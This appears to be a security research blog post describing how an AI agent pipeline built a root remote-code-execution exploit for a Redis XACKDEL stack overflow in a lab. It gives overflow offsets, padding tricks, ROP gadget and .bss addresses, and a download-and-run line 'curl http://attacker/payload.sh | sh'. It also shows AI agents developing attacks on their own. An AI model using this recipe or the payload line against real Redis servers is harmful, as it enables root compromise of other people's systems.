After the OpenSSL run , we had the result we wanted and the doubt that comes with it. One CVE, one successful exploit, one carefully chosen target with the protections turned down. The kind of result where you celebrate for ten minutes and then spend the rest of the evening listing reasons it might not mean anything. Maybe the pipeline got lucky. Maybe the vulnerability was too clean. Maybe the existing public exploits gave the agents too much to work with.

We needed a second target. Something where the public state of the art wasn’t a working RCE with gadget offsets helpfully tabulated in a README - something where the best anyone had published was a crash and a shrug.

We queried the EIP MCP server for recent CWE-121 (stack buffer overflow) CVEs in open-source software with public exploit code - the kind of triage that takes an afternoon of tab-switching when done manually. EIP surfaced a shortlist in under two minutes: CVE-2025-62507 (Redis), CVE-2025-55763 (CivetWeb URI parser overflow), CVE-2026-25968 (ImageMagick stack overflow in MSL attribute handling), CVE-2026-23747 (Golioth Firmware SDK memcpy length issue), CVE-2025-60751 (GeographicLib buffer overflow), CVE-2025-54494 (libbiosig MFER parsing overflow). Redis stood out - highest impact, biggest install base, most interesting gap between CVSS score and public exploit maturity.

The Target

CVE-2025-62507 is a stack-based buffer overflow in Redis 8.2.0 through 8.2.2. CVSS 9.8. The vulnerability is in XACKDEL, a new command introduced in Redis 8.2.0 that atomically acknowledges and deletes stream entries. The only public exploit is a crash PoC and a GDB trace, ending with:

Still some way to go… another day.

That was November 2025. Four months later, no one had taken it further. A CVSS 9.8 vulnerability in Redis - one of the most deployed data stores on earth - with no working RCE exploit. The gap between “I can crash it” and “I can execute code” is real, and it’s where most CVEs stall.

The engineering win isn’t the whole point. A disproportionate share of high-severity CVEs in EIP’s database have no public exploit - just a CVSS score, a vendor advisory, and years of silence. Not because they aren’t dangerous, but because proving exploitability requires the kind of sustained effort that doesn’t fit into a sprint. We wanted to know if a pipeline could do what a human researcher hadn’t gotten to yet.

The Bug

The root cause is a copy-paste omission. Redis stream commands follow a boilerplate pattern: allocate a fixed-size stack buffer for stream IDs, and if the caller sends more IDs than the buffer holds, fall back to heap allocation:

streamID static_ids[STREAMID_STATIC_VECTOR_LEN];  // 128 bytes (8 IDs)
streamID *ids = static_ids;
if (args.numids > STREAMID_STATIC_VECTOR_LEN)
    ids = zmalloc(sizeof(streamID) * args.numids);  // heap fallback

Six functions in t_stream.c use this pattern. Five of them have the bounds check. xackdelCommand() doesn’t. The developer copied the cleanup code - if (ids != static_ids) zfree(ids) is present on line 3278, faithfully transplanted from the sibling functions, ready to free a heap allocation that can never actually happen because the allocation guard is missing. The code compiles. The tests pass for 8 IDs or fewer. The cleanup code gives the illusion of completeness. Everything looks right until someone sends 53.

Two lines. That’s the entire vulnerability. And the two-line fix simply adds the missing if statement.

The Overflow Primitive

Stream IDs are parsed as <ms>-<seq> where both fields are unsigned 64-bit integers. Send 53 stream IDs in a single XACKDEL command and the last few overwrite the saved registers and return address. The geometry:

  • IDs 0-7: Fill the legitimate 128-byte static_ids buffer
  • IDs 8-48: Overwrite 656 bytes of local variables
  • IDs 49-51: Overwrite saved RBX, R12, R13, R14, R15
  • ID 52 ms field: Overwrites saved RBP
  • ID 52 seq field: Overwrites the return address - RIP control
  • IDs 53+: Unlimited ROP chain space

The key insight: because stream IDs are decimal integers parsed via string2ull(), the overflow payload has zero bad characters. An address like 0x000000000044f510 is simply sent as the string "4519184". Full 64-bit range, no null byte restrictions, no encoding constraints. It’s the most favorable overflow primitive you could ask for.

There’s a subtlety the agents had to reason through: IDs 8 through 48 overwrite 656 bytes of live local variables - including a streamIterator, loop counters, and other state - while the parsing loop is still running. The function has to survive all 55+ iterations before reaching the ret instruction where RIP control kicks in. The agents figured out that using 0-0 for the padding IDs keeps the overwritten variables zeroed, which doesn’t trigger any premature goto cleanup branches. Wrong padding values and the function crashes inside the loop instead of at the return.

The Missing Canary

One more detail that matters, and it’s the kind of thing that makes you question your assumptions about compiler protections. Redis is compiled with -fstack-protector, which should insert stack canaries into functions with local buffers. The env-setup agent dutifully reported “Stack canary: Enabled” and flagged it as a challenge. Then the crash-poc agent overflowed the buffer and hit RIP directly. No canary check. No __stack_chk_fail. Nothing.

GCC’s -fstack-protector doesn’t protect every function - only those whose local arrays exceed a size threshold. The streamID static_ids[8] array at 128 bytes fell below that threshold. The compile flag says “protected.” The disassembly says otherwise: no %fs:0x28 load, no canary verification anywhere in the function. We all learned something that day.

A stack overflow with no canary, no PIE, no RELRO, and 169,441 ROP gadgets in a 17.8 MB binary - including eight different write-what-where primitives (mov [rdi], rax; ret, mov [rdi], rdx; ret, and six more). In Redis. The entire exploit is a single, syntactically valid XACKDEL command sent over the normal RESP protocol. From a network monitor’s perspective, it looks like a normal Redis operation with an unusually high ID count.

Act I: No ASLR

./stackforge start CVE=CVE-2025-62507

The pipeline completed in 68 minutes. Eight phases, all on the first attempt, zero retries. After the OpenSSL run needed eight failed attempts and $100 of prompt education to get right, we’d braced ourselves for another expensive afternoon of reading failure logs. Instead, we watched eight green checkmarks appear in sequence and spent the afternoon doubting whether we’d accidentally left something cached.

The vuln-research agent pulled the CVE brief from EIP , cloned the Redis 8.2.0 source, and found the missing bounds check. Its internal deliberation at that moment:

“Now I can see the vulnerability clearly. The static_ids array holds only 8 streamID entries, but args.numids can be larger without a check - there’s no dynamic allocation when numids > 8. Let me examine more context and look for the parser and similar patterns.”

Unprompted, it then audited all six sibling functions using the same static_ids pattern. Five safe, one vulnerable. It mapped the call chain, identified that XACKDEL requires no authentication (Redis default), and assessed the fix as complete.

The lab-build agent compiled Redis 8.2.0 from source with -fno-pie -no-pie -Wl,-z,norelro, stood up a Docker container, and verified the service was accepting connections on port 6379.

The crash-poc agent sent 53 stream IDs and got SIGSEGV at 0x5c30c0. Its reaction in the logs:

“SIGSEGV confirmed! The server crashes with signal 11 when the return address is overwritten.”

Then it checked whether the stack canary - which checksec had reported as enabled on the binary - actually protected this specific function. It disassembled the epilogue, found no %fs:0x28 reference, no __stack_chk_fail call, and delivered the verdict:

“No stack canary in xackdelCommand! The overflow goes straight to RIP control.”

100% reliable across 3 tests. Crash gate: proceed.

The control-analysis agent mapped the register state with unique marker patterns per position - each marker encoding the register name in its hex pattern for instant visual verification in GDB:

rbp = 0xAAAABBBBCCCCDDDD  ← ID[52].ms
rbx = 0xBBBB000000000049  ← ID[49].seq
r12 = 0xCC12CC12CC12CC12  ← ID[50].ms
r13 = 0xDD13DD13DD13DD13  ← ID[50].seq
r14 = 0xEE14EE14EE14EE14  ← ID[51].ms
r15 = 0xFF15FF15FF15FF15  ← ID[51].seq
RIP = 0x1111222233334444  ← ID[52].seq

Seven registers controlled. But the agent’s logs show it catching its own mistake mid-analysis:

“Wait, there’s a discrepancy - my calculation shows rbx at offset 792 = ID[49].seq, but GDB shows rbx = 49 (which is ID[49].ms). Let me reconcile.”

It had the pop order wrong in the epilogue. It stopped, re-read the disassembly, corrected the mapping, and re-verified every register assignment. The kind of self-correction that matters when one wrong offset means the difference between a shell and a crash. Return address at offset 840 from the buffer start (52.5 stream IDs - ID[52].seq hits RIP exactly). Control gate: proceed.

The exploit-dev agent built three strategies:

StrategyGadgetsTechniqueASLR-Safe?
PLT-based4pop rdi → libc "/bin/sh"execve@pltNo
Raw syscall8Write "/bin/sh" to .bssexecve via syscallYes
Arbitrary command14+Write command + argv to .bssexecve("/bin/sh", ["-c", cmd])Yes

The first is the simplest: four gadgets, done. But then the agent’s logs show this deliberation:

“I’ll use Strategy 2 (write /bin/sh to .bss then raw syscall execve) since it’s ASLR-independent and more robust.”

Nobody told it about a future ASLR run. Nobody hinted we were planning one. It just decided, on its own, that an ASLR-independent strategy was worth building. Its deliverable noted the rationale: “does not depend on libc addresses (works even with ASLR if binary base is known).” We read that line twice.

The exploit-dev agent’s log entry when the first RCE test came back:

“CODE EXECUTION ACHIEVED! The file /tmp/pwned.txt contains uid=0(root) gid=0(root) groups=0(root), confirming that our ROP chain successfully executed id > /tmp/pwned.txt as root inside the Redis container!”

The validation agent ran 13 tests: 7 core (shell spawning, command execution, multi-command chains) and 6 edge cases (minimum IDs, long commands, pre-existing data). 100% reliability. The exploit executes arbitrary commands as root via a single Redis protocol message.

CVE-2025-62507-RCE-PROOF
uid=0(root) gid=0(root) groups=0(root)

The Numbers (Act I)

PhaseDurationCost
Vulnerability Research14m 42s$5.27
Environment Setup2m 11s$0.45
Lab Build6m 3s$2.19
Crash PoC8m 2s$2.13
Control Analysis9m 48s$3.12
Exploit Development10m 27s$2.89
Exploit Validation13m 16s$4.33
Report4m 2s$0.76
Total68m 32s$21.13

Eight phases, all on the first attempt, zero retries.

Meanwhile, on GitHub: Still some way to go… another day.

Act II: ASLR

We didn’t stop there. The whole point of the OpenSSL post was an honest admission: ASLR was off, protections were down, it was easy mode. Could Stackforge handle the real thing?

We made two changes to the pipeline. First, we enabled ASLR in the lab container - randomize_va_space=2, full randomization, no setarch -R wrapper. Second, we added the ability to preseed agents with research from a previous run. The idea: don’t make the agents re-discover the vulnerability from scratch. Give them the non-ASLR PoC, the stack layout, the gadget inventory. Let them focus on the hard part - getting past ASLR.

./stackforge start CVE=CVE-2025-62507 --seed ./seed/ --aslr enabled

The agents consumed the seed research like students who’d done the reading before class. The vuln-research agent confirmed the vulnerability details against the new environment, noting that randomize_va_space=2 was active. The env-setup agent - and this took it about thirty seconds - verified the binary still loaded at 0x400000. No PIE means the binary base is fixed even with full ASLR.

You could almost hear the penny drop: ASLR is irrelevant when the binary has no PIE.

Memory RegionASLR OffASLR OnImpact
Binary .text / .bss / .gotFixed 0x400000Fixed 0x400000None
libcFixedRandomizedBreaks Strategy 1
StackFixedRandomizedIrrelevant (ROP on stack after overflow)

The non-ASLR exploit’s Strategy 1 pointed RDI at a libc string ("/bin/sh" at 0x7ffff7c7b031). With ASLR, that address moves every run. Dead.

Strategy 2 doesn’t touch libc at all. It uses a three-gadget write pattern - pop rax; ret to load the value, pop rdi; ret to load the target address, mov [rdi], rax; ret to write 8 bytes - repeated for each chunk of data staged into .bss. The chain writes "/bin/sh\0" to 0x7c2dc0, then sets up rdi, rsi=0, rdx=0, rax=59, and hits a raw syscall at 0x4d1355. Every address comes from the binary. ASLR can randomize libc, the stack, and the heap all it wants - none of those addresses appear in the payload.

No information leak. No brute force. No partial overwrite. The agents didn’t bypass ASLR - they designed around it.

The agents also fixed the 240-character command limit from the first run. The non-ASLR exploit staged the command at .bss+16 with the argv[] array at .bss+256 - commands longer than 240 bytes would collide with the argv[0] pointer, whose first null byte truncated the string. The ASLR version separated the regions entirely: "/bin/sh" at 0x7c2dc0, argv[] at 0x7c2e00, command string at 0x7c2e40. No collision possible. Maximum command length: ~2MB, limited only by the 2.3MB .bss section.

The ASLR exploit also dropped the pwntools dependency entirely. Pure Python stdlib - socket, struct, time. The non-ASLR version used from pwn import *; the ASLR version is self-contained.

The preseeding saved real time. Lab-build through exploit-validation took 48 minutes in the first run and 34 minutes in the second - 29% faster. The agents skipped discovery and went straight to adaptation.

The Numbers (Act II)

PhaseDurationCost
Vulnerability Research11m 42s$2.71
Environment Setup0m 30s$0.10
Lab Build10m 18s$0.71
Crash PoC6m 0s$1.23
Control Analysis14m 48s$4.73
Exploit Development13m 48s$3.54
Exploit Validation22m 48s$3.21
Report24m 42s$6.64
Total104m 36s$22.88

Longer than Act I - the control-analysis and validation phases took more time because the agents were re-validating everything against the ASLR environment and running more edge cases. The report phase was unusually long because it incorporated findings from both runs into a single comprehensive writeup.

The exploit works with full ASLR enabled: 10/10 reliability across container restarts (5 command execution, 2 shell spawns, 3 crash/DoS), arbitrary command execution as root, randomize_va_space=2 confirmed active throughout. The validation agent verified the binary base programmatically across restarts:

ASLR Level: /proc/sys/kernel/randomize_va_space = 2 (FULL ASLR ENABLED)
Run 1: 00400000-0044b000 r--p ... /opt/redis/bin/redis-server
Run 2: 00400000-0044b000 r--p ... /opt/redis/bin/redis-server
Binary base address is identical. ASLR affects only libc, heap, and stack  - 
none of which are needed by the exploit's ROP chain.

The 240-Character Discovery

The validation agent found an interesting constraint. The arbitrary command execution mode writes the command string to .bss starting at offset +16, but the argv[] array is constructed at .bss+256. Commands longer than 240 bytes collide with the argv[] pointer - the first null byte of the little-endian pointer truncates the command string.

The validation agent went deep on this one. Its logs show it arguing with itself about byte-level write ordering:

“Wait - 240 chars DOES overlap with argv at bss+256, yet it worked! Let me understand why. The key is the ordering in the ROP chain - argv is written AFTER cmd data.”

It then traced the little-endian byte layout of the argv[0] pointer at the collision boundary to explain exactly why 240 works and 248 doesn’t. Nobody asked it to do this. It just needed to know.

The workaround is obvious: staged payloads. Write a script file, then execute it. Or curl http://attacker/payload.sh | sh. Nobody’s using a ROP chain to type a novel.

What the EIP MCP Server Did

The EIP MCP server gave the vuln-research agent the CVE brief, the fix commit hash, the affected version range, and - critically - flagged that the existing public exploits were crash-only. No working RCE to reference. The agent couldn’t lean on someone else’s gadget offsets or payload structure. It had to build from the vulnerability analysis and the binary itself.

For a CVE where the public state of the art was “Still some way to go… another day,” having structured intelligence about what exists (and what doesn’t) told the pipeline exactly how much original work was needed.

What This Means

Two CVEs. Two targets. Two very different vulnerability classes - a library-level ASN.1 parsing bug in OpenSSL and a command handler stack overflow in Redis. Both produced verified RCE. The Redis run needed zero retries across all eight phases. The ASLR run produced an exploit that works with full address randomization.

The OpenSSL run proved the architecture works. The Redis run proved it wasn’t a fluke.

A few things we didn’t expect:

The canary heuristic gap. GCC’s -fstack-protector isn’t a guarantee. Functions with arrays below the size threshold don’t get canaries. xackdelCommand() has a 128-byte local array and no canary. The agents discovered this by examining the disassembly - no %fs:0x28 load - and correctly identified it as a compiler heuristic quirk, not a configuration error.

The proactive ASLR strategy. The exploit-dev agent in the non-ASLR run, unprompted, developed an ASLR-independent strategy using only binary-internal addresses. When we ran the ASLR version, that strategy was already proven. The seed research handed it over; the ASLR agent just had to verify it still worked.

The ideal overflow primitive. Decimal-encoded unsigned 64-bit integers as the overflow vehicle means zero bad characters, full address range, and unlimited chain length. The agents recognized this explicitly and noted it as “the most favorable overflow primitive possible for ROP exploitation.” They’re not wrong.

The copy-paste irony. The cleanup code if (ids != static_ids) zfree(ids) was faithfully copied from the sibling functions. The security-critical allocation guard was not. The boilerplate survived; the protection didn’t. Two missing lines. Four months of silence. uid=0(root).

What’s Next

Stackforge has now produced verified RCE for two CVEs across two vulnerability classes. The Redis run validated the improvements we made after OpenSSL - binary path validation in preflight, ASLR enforcement, lab prompt hints - and ran clean on the first attempt.

The next frontier is PIE. Both targets so far had no PIE, which means the binary base is fixed and all gadgets are at known addresses. A PIE-enabled binary randomizes the binary itself, not just libc. That requires an information leak - reading an address from the running process to calculate the binary base - before the ROP chain can be constructed. A harder problem. A different kind of agent work. The kind where you can’t just design around the mitigation because there’s nothing left to stand on.

But we said the same thing about ASLR, and then the agents solved it in thirty seconds. So we’ll see.

One CVE number. Zero existing RCE exploits. Nine agents. Sixty-eight minutes. Full ASLR. uid=0(root). Still some way to go… another day - turns out it was today.